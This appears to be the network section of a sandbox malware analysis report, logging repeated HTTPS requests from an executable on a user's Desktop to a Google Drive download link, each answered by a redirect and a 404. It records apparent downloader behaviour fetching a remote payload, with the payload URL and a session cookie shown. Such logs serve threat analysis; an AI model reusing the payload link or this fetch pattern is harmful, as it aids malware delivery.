                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:04:19 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:04:19 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-EtXWavYe5oppyNaK2ePbNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID: 15 | Source IP: 192.168.11.20 | Source Port: 49766 | Destination IP: 142.250.64.193 | Destination Port: 443 | PID: 5216 | Process: C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:04:20 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:04:20 UTC | 1854 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:04:20 GMT
                                                        Content-Security-Policy: script-src 'nonce-dzfoslekdVLnTmyg9QmvDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC4o1auPodTVc1U8tdZnCmRNEnV4MrVkQZ-F6ewcygyrvkIfkGIwvDZQiE7yr88u0yt91Hh1_GAAGA
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:04:20 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bqm0xCsrIc7gFs-HuNlvNg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID: 16 | Source IP: 192.168.11.20 | Source Port: 49767 | Destination IP: 142.250.217.238 | Destination Port: 443 | PID: 5216 | Process: C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:04:30 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:04:31 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:04:31 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-nvLkqm4aFAYZkj8kv9zNDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID: 17 | Source IP: 192.168.11.20 | Source Port: 49768 | Destination IP: 142.250.64.193 | Destination Port: 443 | PID: 5216 | Process: C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:04:31 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:04:31 UTC | 1854 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:04:31 GMT
                                                        Content-Security-Policy: script-src 'nonce-PalheP376nsrsJ1wdhzABQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC5wr8Hr-ERYLSKXTQ39aHOvNGQ0UBQg06ByK_MSl9LnSPk7ejRANmOmy9cNXK0zp6kBJ0pgLdl_EA
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:04:31 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GRG929zNHx-VZJo6DrficA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID: 18 | Source IP: 192.168.11.20 | Source Port: 49769 | Destination IP: 142.250.217.238 | Destination Port: 443 | PID: 5216 | Process: C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:04:42 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:04:42 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:04:42 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce--kFV5FRUscQcDaQAf4WyuQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID: 19 | Source IP: 192.168.11.20 | Source Port: 49770 | Destination IP: 142.250.64.193 | Destination Port: 443 | PID: 5216 | Process: C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:04:42 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:04:43 UTC | 1854 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:04:42 GMT
                                                        Content-Security-Policy: script-src 'nonce-dBEiWtpriMk1vP6-CSsLsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC5djuB6u451xkPbseAL2Fw74gu2-sYdnhC3ouDL0RL73a4EhlUSBQc4f1IESZpCPmNqgEciUnQ0ng
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:04:43 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5YW9A5ByT84Tgp6jTPn7Sg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID: 20 | Source IP: 192.168.11.20 | Source Port: 49771 | Destination IP: 142.250.217.238 | Destination Port: 443 | PID: 5216 | Process: C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:04:53 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:04:53 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:04:53 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-2N9DTjIyVkWo4GR7RD4uew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        21 | 192.168.11.20 | 49772 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:04:53 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:04:54 UTC | 1854 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:04:54 GMT
                                                        Content-Security-Policy: script-src 'nonce-ZWCLr7XKLGW4va_yB5twHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC5Z-QIukitg_Etj8K5EQRQqD8Py4uWAIGJ7iazhkSELJ7OndcfAmYvMrF6O2vOSc8wYf16Lg0Xpqg
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:04:54 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="u1Plbm-SMttfomEOY3JIrQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        22 | 192.168.11.20 | 49773 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:05:04 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:05:04 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:05:04 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce--B-NqRJw0DlRquRhX8j98A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
